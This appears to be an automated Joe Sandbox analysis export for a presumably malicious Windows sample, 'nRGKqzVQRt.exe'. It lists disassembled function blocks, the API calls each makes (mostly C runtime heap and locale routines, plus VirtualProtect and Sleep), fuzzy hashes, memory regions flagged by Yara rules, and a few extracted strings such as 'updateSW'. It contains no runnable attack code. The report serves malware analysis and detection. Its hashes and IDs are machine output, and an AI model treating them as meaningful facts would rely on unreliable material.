                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1423051803-0
                                                  • Opcode ID: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                                  • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                                  • Opcode Fuzzy Hash: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                                  • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                                  APIs
                                                    • Part of subcall function 0041A395: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041A3C7
                                                  • _free.LIBCMT ref: 00417E40
                                                  • _free.LIBCMT ref: 00417E57
                                                  • _free.LIBCMT ref: 00417E74
                                                  • _free.LIBCMT ref: 00417E8F
                                                  • _free.LIBCMT ref: 00417EA6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3033488037-0
                                                  • Opcode ID: 796391581251b77269079763240f90f867541923407a82df9009afead37a043d
                                                  • Instruction ID: b09f1d80b9d524519e6a2af905cbdca403bfb98ecb25127e3a5e28922fcd0f4f
                                                  • Opcode Fuzzy Hash: 796391581251b77269079763240f90f867541923407a82df9009afead37a043d
                                                  • Instruction Fuzzy Hash: CA51A272A04308AFDB21DF2ADC81BEA77F5EF44714B14056EE805D7291E739DD818B98
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3033488037-0
                                                  • Opcode ID: bf325a0276ac7524d4f60471fb5fe8747a97fbc829fc97ca04c34618ab33ca25
                                                  • Instruction ID: 0f33de791b01e5c9feb0ec488d5b1005a32b95843d00ed792d5c503c8ca99453
                                                  • Opcode Fuzzy Hash: bf325a0276ac7524d4f60471fb5fe8747a97fbc829fc97ca04c34618ab33ca25
                                                  • Instruction Fuzzy Hash: 6051D371A40205AFDB21DF29CC42AAA77F6EF54720B14856DE80DD7291EB35EE01CB94
                                                  APIs
                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 00662C4F
                                                  • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00662C64
                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00662C72
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00662C8D
                                                  • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00662CAC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                                  • String ID:
                                                  • API String ID: 2509773233-0
                                                  • Opcode ID: 8ff13bd64c836a37172eabe9342752174e9479ef80da464201f40468a1b6010f
                                                  • Instruction ID: d8978c4616e9092c2ec7bb3602dd71a02537144a498b2b5454925cfb0d1cbe8d
                                                  • Opcode Fuzzy Hash: 8ff13bd64c836a37172eabe9342752174e9479ef80da464201f40468a1b6010f
                                                  • Instruction Fuzzy Hash: 2A311272B00405AFDB149F68DC50FAEB7AAEF48710F4641ADF905EB251CB31AE06CB94
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0043F182
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0043F1A5
                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0043F226
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0043F247
                                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 0043F261
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: LockitLockit::_std::_$Facet_Registerstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                  • String ID:
                                                  • API String ID: 2929382975-0
                                                  • Opcode ID: 011b66f31ed96c6d7ce0684380522aa60c623a31d8bbda318f5410154e17e4c4
                                                  • Instruction ID: 5c2f1590632ce50086238b0663d6ac00eeb87f434218a5b0a9d45e1460e8e59e
                                                  • Opcode Fuzzy Hash: 011b66f31ed96c6d7ce0684380522aa60c623a31d8bbda318f5410154e17e4c4
                                                  • Instruction Fuzzy Hash: 3031C0B1D00215DFCB14DF55D941BAFB370AB18724F10127FE92267292DB38AD08CB9A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                                  • String ID:
                                                  • API String ID: 3136044242-0
                                                  • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                  • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                                  • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                  • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                                  APIs
                                                  • __getptd_noexit.LIBCMT ref: 0044146F
                                                    • Part of subcall function 00444E11: ___set_flsgetvalue.LIBCMT ref: 00444E23
                                                    • Part of subcall function 00444E11: __calloc_crt.LIBCMT ref: 00444E37
                                                  • __calloc_crt.LIBCMT ref: 00441491
                                                  • __get_sys_err_msg.LIBCMT ref: 004414AF
                                                  • _strcpy_s.LIBCMT ref: 004414B7
                                                  • __invoke_watson.LIBCMT ref: 004414CC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __calloc_crt$___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                                                  • String ID:
                                                  • API String ID: 27446768-0
                                                  • Opcode ID: 0bcc0e350303ad3649bc9898270f928d7f79292a72bd352e6ab9c7dae69df600
                                                  • Instruction ID: f14487832c4465ef80c755e4f3026394dce4aaa12c0731f30ed0c50e2eba33ac
                                                  • Opcode Fuzzy Hash: 0bcc0e350303ad3649bc9898270f928d7f79292a72bd352e6ab9c7dae69df600
                                                  • Instruction Fuzzy Hash: 80F05032A002202BF72039979C8196B71DCCB8077C711443FF508A7622E56DDCC141ED
                                                  APIs
                                                  • __CreateFrameInfo.LIBCMT ref: 0044570F
                                                    • Part of subcall function 004412AF: __getptd.LIBCMT ref: 004412BD
                                                    • Part of subcall function 004412AF: __getptd.LIBCMT ref: 004412CB
                                                  • __getptd.LIBCMT ref: 00445719
                                                    • Part of subcall function 00444E8A: __getptd_noexit.LIBCMT ref: 00444E8D
                                                    • Part of subcall function 00444E8A: __amsg_exit.LIBCMT ref: 00444E9A
                                                  • __getptd.LIBCMT ref: 00445727
                                                  • __getptd.LIBCMT ref: 00445735
                                                  • __getptd.LIBCMT ref: 00445740
                                                    • Part of subcall function 00441354: __CallSettingFrame@12.LIBCMT ref: 004413A0
                                                    • Part of subcall function 0044580D: __getptd.LIBCMT ref: 0044581C
                                                    • Part of subcall function 0044580D: __getptd.LIBCMT ref: 0044582A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                  • String ID:
                                                  • API String ID: 3282538202-0
                                                  • Opcode ID: b6760be45b9f225ffa09967988b535121e0307cdc767a6bd6a579ea3f436cff5
                                                  • Instruction ID: 100f70731243ec5b3d05a4c225f3cf9df2c243dd7601ccd32b0289c9ab617f5e
                                                  • Opcode Fuzzy Hash: b6760be45b9f225ffa09967988b535121e0307cdc767a6bd6a579ea3f436cff5
                                                  • Instruction Fuzzy Hash: 1511B371C00609DBEF00EFA5C446BADBBB4FF44315F10806AE814A7252DB789A559F58
                                                  APIs
                                                  • _free.LIBCMT ref: 0041FBF2
                                                    • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                    • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                  • _free.LIBCMT ref: 0041FC04
                                                  • _free.LIBCMT ref: 0041FC16
                                                  • _free.LIBCMT ref: 0041FC28
                                                  • _free.LIBCMT ref: 0041FC3A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: f71149921f413fa43df794f6df76e54a2fab879d3f4956e12af54e0adfca1412
                                                  • Instruction ID: 1c7e9378ca95dd73cb2f75351d3b74d040f08b2e1626f4982a7efc7f0f8a2d9c
                                                  • Opcode Fuzzy Hash: f71149921f413fa43df794f6df76e54a2fab879d3f4956e12af54e0adfca1412
                                                  • Instruction Fuzzy Hash: 30F06873649108A78624DB55E585CCB73DDBB04310354081BF488D7701C738FCC19AAC
                                                  APIs
                                                  • _free.LIBCMT ref: 1000C536
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  • _free.LIBCMT ref: 1000C548
                                                  • _free.LIBCMT ref: 1000C55A
                                                  • _free.LIBCMT ref: 1000C56C
                                                  • _free.LIBCMT ref: 1000C57E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                                  • Instruction ID: 9141c028a1f6e8267eca5b553c4c44ea57822cd8596d4ab818939ac7a44c1903
                                                  • Opcode Fuzzy Hash: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                                  • Instruction Fuzzy Hash: BEF0E739A046289BE650DB68ECC2C1A73D9FB456E17608805F448E7699CB34FFC08AA4
                                                  APIs
                                                  • _free.LIBCMT ref: 0067FE59
                                                    • Part of subcall function 0067994F: HeapFree.KERNEL32(00000000,00000000,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?), ref: 00679965
                                                    • Part of subcall function 0067994F: GetLastError.KERNEL32(?,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?,?), ref: 00679977
                                                  • _free.LIBCMT ref: 0067FE6B
                                                  • _free.LIBCMT ref: 0067FE7D
                                                  • _free.LIBCMT ref: 0067FE8F
                                                  • _free.LIBCMT ref: 0067FEA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 833792b777c6c03e8cf0aa346d63d203dbff7c932eedd85bdc8b2f7842ed42dd
                                                  • Instruction ID: 777af9280cde547368bf69dd8d96074427d84b83165e311a2399c0cdb098b71b
                                                  • Opcode Fuzzy Hash: 833792b777c6c03e8cf0aa346d63d203dbff7c932eedd85bdc8b2f7842ed42dd
                                                  • Instruction Fuzzy Hash: B0F0F4735042017BDA65DB54E486C5B73DBAA04720758982DF59CD7722D734FC808A68
                                                  APIs
                                                  • __getptd.LIBCMT ref: 004478AC
                                                    • Part of subcall function 00444E8A: __getptd_noexit.LIBCMT ref: 00444E8D
                                                    • Part of subcall function 00444E8A: __amsg_exit.LIBCMT ref: 00444E9A
                                                  • __getptd.LIBCMT ref: 004478C3
                                                  • __amsg_exit.LIBCMT ref: 004478D1
                                                  • __lock.LIBCMT ref: 004478E1
                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 004478F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                  • String ID:
                                                  • API String ID: 938513278-0
                                                  • Opcode ID: 923d6c630d4c297d87a02d45e19dfa0e084befcd42006bedb7e5a93df283f21b
                                                  • Instruction ID: cbe63d035281a46d543817e7181c3727ccf0586aed82f3b742ed6fc3b219eb25
                                                  • Opcode Fuzzy Hash: 923d6c630d4c297d87a02d45e19dfa0e084befcd42006bedb7e5a93df283f21b
                                                  • Instruction Fuzzy Hash: 3FF062329087109AF621BFA5540775E7790AF40729F21811FF424666D3CB2C4A42DB5D
                                                  APIs
                                                    • Part of subcall function 0066D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D37E
                                                    • Part of subcall function 0066D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D3BB
                                                  • __Init_thread_footer.LIBCMT ref: 00665FC2
                                                    • Part of subcall function 0066D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D333
                                                    • Part of subcall function 0066D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D366
                                                  • Sleep.KERNEL32(000007D0), ref: 00666340
                                                  • Sleep.KERNEL32(000007D0), ref: 0066635A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeaveSleep$Init_thread_footer
                                                  • String ID: updateSW
                                                  • API String ID: 500923978-2484434887
                                                  • Opcode ID: bd253d3c5d198e889332913f0522b8ddf46f9631c779f21dd1867174954e9587
                                                  • Instruction ID: 9bd4c751cbba43aa16e1ae4c3855ac90825e7069326dc5daac849d2bf2340a63
                                                  • Opcode Fuzzy Hash: bd253d3c5d198e889332913f0522b8ddf46f9631c779f21dd1867174954e9587
                                                  • Instruction Fuzzy Hash: 5BD12571A001548BDF289B28DC997ADBB77AF41304F1481EDF809AB392DB359EC4CB95
                                                  APIs
                                                    • Part of subcall function 006643B7: ___std_exception_copy.LIBVCRUNTIME ref: 00664446
                                                  • std::locale::_Init.LIBCPMT ref: 0066A335
                                                    • Part of subcall function 0066C77D: std::_Lockit::_Lockit.LIBCPMT ref: 0066C78F
                                                    • Part of subcall function 0066C77D: std::locale::_Setgloballocale.LIBCPMT ref: 0066C7AA
                                                    • Part of subcall function 0066C77D: _Yarn.LIBCPMT ref: 0066C7C0
                                                    • Part of subcall function 0066C77D: std::_Lockit::~_Lockit.LIBCPMT ref: 0066C800
                                                    • Part of subcall function 0066AE47: std::_Lockit::_Lockit.LIBCPMT ref: 0066AE7D
                                                    • Part of subcall function 0066AE47: std::_Lockit::_Lockit.LIBCPMT ref: 0066AEA0
                                                    • Part of subcall function 0066AE47: std::_Lockit::~_Lockit.LIBCPMT ref: 0066AEC0
                                                    • Part of subcall function 0066AE47: std::_Lockit::~_Lockit.LIBCPMT ref: 0066AF3A
                                                  • std::locale::_Init.LIBCPMT ref: 0066A3F8
                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0066A50F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_std::locale::_$Init$Concurrency::cancel_current_taskSetgloballocaleYarn___std_exception_copy
                                                  • String ID: X:C
                                                  • API String ID: 569503877-1469212745
                                                  • Opcode ID: 217f668ab1de721d73fda48ba94b0dbc39f4964a2ce04ccc1313e00a63b23f01
                                                  • Instruction ID: 07ac97c45bd07ab417ffb4bc3442168fc8174899fff6a08425f727cf7006c0bb
                                                  • Opcode Fuzzy Hash: 217f668ab1de721d73fda48ba94b0dbc39f4964a2ce04ccc1313e00a63b23f01
                                                  • Instruction Fuzzy Hash: 46A136B4A00205DFDB00CF54C494B9ABBF5FF49314F1582A9E809AF792D7BAA944CF91
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: *?
                                                  • API String ID: 269201875-2564092906
                                                  • Opcode ID: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                                  • Instruction ID: 7b94f7270babd41a129a228fbe6cecbdc5f775369f8c1ab1d48f9322781d5c4e
                                                  • Opcode Fuzzy Hash: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                                  • Instruction Fuzzy Hash: 0C614175D0021A9FEB14CFA9C8815EDFBF5FF48390B2581AAE809F7344D675AE418B90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\nRGKqzVQRt.exe$h'u
                                                  • API String ID: 0-1145913199
                                                  • Opcode ID: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                                  • Instruction ID: cc2ecb4b5d0b55cd4a25e2381517e3645a439caaa5f14caae8cc7f97f4731dcb
                                                  • Opcode Fuzzy Hash: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                                  • Instruction Fuzzy Hash: 9241AD75E00215BBEB11CB99CC8199FBBF9EF89390B244066F901A7216D6719B80CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\nRGKqzVQRt.exe$h'u
                                                  • API String ID: 0-1145913199
                                                  • Opcode ID: bb4cfbba668be04de8d9afecadb41173a1c3b024eb1c9cedbc90692787106584
                                                  • Instruction ID: fced65c5c8163eaa3016068cbabcf3d1c3aec45149e47900976993d52b562c95
                                                  • Opcode Fuzzy Hash: bb4cfbba668be04de8d9afecadb41173a1c3b024eb1c9cedbc90692787106584
                                                  • Instruction Fuzzy Hash: E641A2B1A00615AFDB21DB99CC81DEFBBBAEF84710F14C06AF509A7311EA719E41CB54
                                                  APIs
                                                  • __alloca_probe_16.LIBCMT ref: 0041BE7F
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,0000FDE9), ref: 0041BEDC
                                                  • __freea.LIBCMT ref: 0041BEE5
                                                    • Part of subcall function 0041A395: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041A3C7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeapStringType__alloca_probe_16__freea
                                                  • String ID: uA
                                                  • API String ID: 2035984020-3888042258
                                                  • Opcode ID: 7155a43ec1d6933e7fe47e47275e285a3df6f51680ee3be0c486694057325eca
                                                  • Instruction ID: 8ad0d2bb7cf9ccb20e4a1086eca39ddb9b037eee8af06865313e927ef5ed8ba2
                                                  • Opcode Fuzzy Hash: 7155a43ec1d6933e7fe47e47275e285a3df6f51680ee3be0c486694057325eca
                                                  • Instruction Fuzzy Hash: E631AF7290021AABDB219F65CC41EEF7BB9EF84714F05412AFD14A7291D7388D91CBE8
                                                  APIs
                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 004041DF
                                                    • Part of subcall function 0040E393: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,004010DD,?,0040C2C5,?,00435218,?,?,?,?,004010DD,00438E00,00438E01), ref: 0040E3F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise___std_exception_copy
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 3109751735-1866435925
                                                  • Opcode ID: 9681fa31f44d55695c752986d1b18a626e2cd7d4e58cff6f511573f18fceb534
                                                  • Instruction ID: 13cacc8724f6aa836e6ba3b181d95373929fba2349835315f28fc814294e7515
                                                  • Opcode Fuzzy Hash: 9681fa31f44d55695c752986d1b18a626e2cd7d4e58cff6f511573f18fceb534
                                                  • Instruction Fuzzy Hash: 6911D2F1600704ABC310DE69C802B96B7E8AF94311F14C63FFA54AB681E778E954CB99
                                                  APIs
                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00664446
                                                    • Part of subcall function 0066E5FA: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00661344,?,0066C52C,?,00435218,?,?,?,?,00661344,00438E00,00438E01), ref: 0066E65A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionRaise___std_exception_copy
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 3109751735-1866435925
                                                  • Opcode ID: 620105460546bc7a548feef953e988388133d47a47cf20a4bd6377840e9f9762
                                                  • Instruction ID: 0ec194b0a5ed4b10cf81698b120daaf9fa55974c80cdb50a0af8c9bb599de0e7
                                                  • Opcode Fuzzy Hash: 620105460546bc7a548feef953e988388133d47a47cf20a4bd6377840e9f9762
                                                  • Instruction Fuzzy Hash: A61121B1600704ABC300DF18C802B9AB3E9EF94311F14C62BF95597741EB75EA10CB95
                                                  APIs
                                                  • _malloc.LIBCMT ref: 00440D46
                                                    • Part of subcall function 00442116: __FF_MSGBANNER.LIBCMT ref: 0044212F
                                                    • Part of subcall function 00442116: __NMSG_WRITE.LIBCMT ref: 00442136
                                                  • std::exception::exception.LIBCMT ref: 00440D7B
                                                  • std::exception::exception.LIBCMT ref: 00440D95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: std::exception::exception$_malloc
                                                  • String ID: C
                                                  • API String ID: 993072523-1915930400
                                                  • Opcode ID: 8b603603fc2e72764e8159916ceab556aeede2d005fbef45fca51803ed383819
                                                  • Instruction ID: 309dc15a062e557a29022923b085cfe56a5b7c6be6ef7efd11823a81c16b354e
                                                  • Opcode Fuzzy Hash: 8b603603fc2e72764e8159916ceab556aeede2d005fbef45fca51803ed383819
                                                  • Instruction Fuzzy Hash: 9AF0F9709002095AEB10ABD5EC0679E3BA96B41718F10403FFB00A61E3CBFC9A69835E
                                                  APIs
                                                  • __lock.LIBCMT ref: 00444DA2
                                                    • Part of subcall function 00447A93: __mtinitlocknum.LIBCMT ref: 00447AA9
                                                    • Part of subcall function 00447A93: __amsg_exit.LIBCMT ref: 00447AB5
                                                    • Part of subcall function 00447A93: RtlFreeHeap.NTDLL(00000000,00000000,?,00444DA7,0000000D), ref: 00447ABD
                                                  • __lock.LIBCMT ref: 00444DC3
                                                  • ___addlocaleref.LIBCMT ref: 00444DE1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __lock$FreeHeap___addlocaleref__amsg_exit__mtinitlocknum
                                                  • String ID: 8(@
                                                  • API String ID: 4016207243-4273504768
                                                  • Opcode ID: 94cd8b7a7404d5e253c1fc2766e583b4f892fa046bf5be8a5fe60ef0ec7bd25c
                                                  • Instruction ID: 4db1ba5b61d5021f4c39dccde2a34a0d81d02722981cb316bdf5bd15526fb5f9
                                                  • Opcode Fuzzy Hash: 94cd8b7a7404d5e253c1fc2766e583b4f892fa046bf5be8a5fe60ef0ec7bd25c
